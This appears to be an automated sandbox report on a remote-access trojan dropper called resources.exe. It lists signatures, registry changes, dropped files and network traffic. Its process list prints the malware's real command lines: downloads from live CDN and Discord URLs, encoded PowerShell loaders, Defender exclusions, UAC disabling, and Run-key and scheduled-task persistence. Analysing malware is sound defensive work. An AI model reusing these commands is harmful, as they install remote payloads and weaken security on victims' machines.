Analysis Overview
SHA256
f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Threat Level: Known bad
The file resources.exe was found to be: Known bad.
Malicious Activity Summary
ZGRat
Detect ZGRat V1
UAC bypass
AsyncRat
Async RAT payload
Downloads MZ/PE file
Blocklisted process makes network request
Drops startup file
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Creates scheduled task(s)
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-15 10:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-15 10:44
Reported
2023-11-15 10:46
Platform
win10v2004-20231023-en
Max time kernel
154s
Max time network
161s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\2WinDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4004 set thread context of 2812 | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2128 set thread context of 448 | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4124 set thread context of 3312 | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4712 set thread context of 1100 | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 3312 set thread context of 2800 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="
C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1380 -ip 1380
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 804
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.105.26.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.52.96.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 31.219.227.13.in-addr.arpa | udp |
